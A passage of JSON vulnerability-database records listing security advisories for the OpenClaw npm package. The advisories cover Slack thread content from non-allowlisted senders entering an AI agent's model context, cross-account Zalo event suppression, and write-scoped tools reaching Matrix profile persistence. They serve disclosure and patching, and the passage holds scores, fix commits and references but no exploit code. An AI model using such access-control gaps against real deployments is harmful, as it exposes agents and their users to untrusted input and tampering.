"GHSA-ccx3-fw7q-rr2r", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-ccx3-fw7q-rr2r" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109872?format=api", "purl": "pkg:npm/openclaw@2026.4.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2g7x-vu14-nkde" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dqb2-dej7-augt" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-h9a4-1twb-d7d1" }, { "vulnerability": "VCID-hy24-6xpe-pkb7" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-wyat-1259-2kg9" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8" } ], "aliases": [ "CVE-2026-42420", "GHSA-ccx3-fw7q-rr2r" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-psms-gauf-tkbz" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/92825?format=api", "vulnerability_id": "VCID-q6ne-sw1r-xkd1", "summary": "OpenClaw: Slack thread context could include messages from non-allowlisted senders\n## Summary\n\nBefore OpenClaw 2026.4.2, Slack thread starter and thread-history context fetched through the API was not filtered by the effective sender allowlist. Messages from non-allowlisted senders could still enter the agent context when an allowlisted user replied in the same thread.\n\n## Impact\n\nA Slack deployment that relied on sender allowlists could still feed non-allowlisted thread content into the model context through thread history. This was a sender-access-control bypass on Slack thread context, not a direct channel-auth bypass.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `ac5bc4fb37becc64a2ec314864cca1565e921f2d` — filter Slack thread context by the effective allowlist\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live.\n\nOpenClaw thanks @AntAISecurityLab for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41358", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04402", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04376", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.0439", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41358" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/ac5bc4fb37becc64a2ec314864cca1565e921f2d", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:34:23Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/ac5bc4fb37becc64a2ec314864cca1565e921f2d" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qm77-8qjp-4vcm", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" }, { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:34:23Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qm77-8qjp-4vcm" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41358", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41358" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-sender-allowlist-bypass-via-slack-thread-context", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:34:23Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-sender-allowlist-bypass-via-slack-thread-context" }, { "reference_url": "https://github.com/advisories/GHSA-qm77-8qjp-4vcm", "reference_id": "GHSA-qm77-8qjp-4vcm", "reference_type": "", "scores": [ { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-qm77-8qjp-4vcm" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109939?format=api", "purl": "pkg:npm/openclaw@2026.4.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2" } ], "aliases": [ "CVE-2026-41358", "GHSA-qm77-8qjp-4vcm" ], "risk_score": 2.5, "exploitability": "0.5", "weighted_severity": "4.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-q6ne-sw1r-xkd1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89752?format=api", "vulnerability_id": "VCID-q9jf-srt4-fbcg", "summary": "OpenClaw: Zalo replay dedupe cache could suppress events across authenticated webhook targets\n## Summary\n\nBefore OpenClaw 2026.3.31, the Zalo webhook replay-dedupe cache was shared across authenticated webhook targets and keyed too broadly. In multi-account deployments, a replay seen on one account could suppress a legitimate event on another account if `event_name` and `message_id` matched.\n\n## Impact\n\nAn attacker who controlled one authenticated Zalo webhook path in a multi-account gateway deployment could cause silent message suppression on a different Zalo account sharing that gateway. This was an availability issue; it did not provide cross-account authentication or data access.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `>= 2026.2.19, < 2026.3.31`\n- Patched versions: `>= 2026.3.31`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `4d038bb242c11f39e45f6a4bde400e5fd42e4ebf` — scope webhook replay dedupe per target\n- `7cea7c29705b188b464cc9cdc107c275b94b2a72` — follow-up hardening to scope replay dedupe by path and account\n\n## Release Process Note\n\nThe initial fix shipped in OpenClaw `2026.3.31` on March 31, 2026. The current published npm release `2026.4.1` from April 1, 2026 also contains follow-up hardening for the same surface.\n\nThanks @nexrin for reporting.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/4d038bb242c11f39e45f6a4bde400e5fd42e4ebf", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/4d038bb242c11f39e45f6a4bde400e5fd42e4ebf" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/7cea7c29705b188b464cc9cdc107c275b94b2a72", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/7cea7c29705b188b464cc9cdc107c275b94b2a72" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-fqrj-m88p-qf3v", "reference_id": "", "reference_type": "", "scores": [ { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-fqrj-m88p-qf3v" }, { "reference_url": "https://github.com/advisories/GHSA-fqrj-m88p-qf3v", "reference_id": "GHSA-fqrj-m88p-qf3v", "reference_type": "", "scores": [ { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-fqrj-m88p-qf3v" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "GHSA-fqrj-m88p-qf3v" ], "risk_score": 1.4, "exploitability": "0.5", "weighted_severity": "2.7", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-q9jf-srt4-fbcg" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90075?format=api", "vulnerability_id": "VCID-qedr-a3ay-v3gx", "summary": "OpenClaw: Matrix profile config persistence was reachable from operator.write message tools\n## Summary\n\nMatrix profile config persistence was reachable from operator.write message tools.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nGateway `operator.write` message-tool paths could reach Matrix profile persistence that should have required admin-level authority.\n\n## Technical Details\n\nThe fix gates Matrix profile updates for non-owner message-tool runs and prevents write-scoped callers from mutating persistent profile config.\n\n## Fix\n\nThe issue was fixed in #62662. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `fe0f686c9228fffcec6de4011da45e69a6e23e54`\n- PR: #62662\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zpbrent and @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42433", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00028", "scoring_system": "epss", "scoring_elements": "0.08411", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00032", "scoring_system": "epss", "scoring_elements": "0.09776", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00032", "scoring_system": "epss", "scoring_elements": "0.09802", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42433" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/fe0f686c9228fffcec6de4011da45e69a6e23e54", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T13:48:50Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/fe0f686c9228fffcec6de4011da45e69a6e23e54" }, { "reference_url": "https://github.com/openclaw/openclaw/pull/62662", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/pull/62662" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-7jp6-r74r-995q", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T13:48:50Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-7jp6-r74r-995q" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42433", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42433" }, { "reference_url": 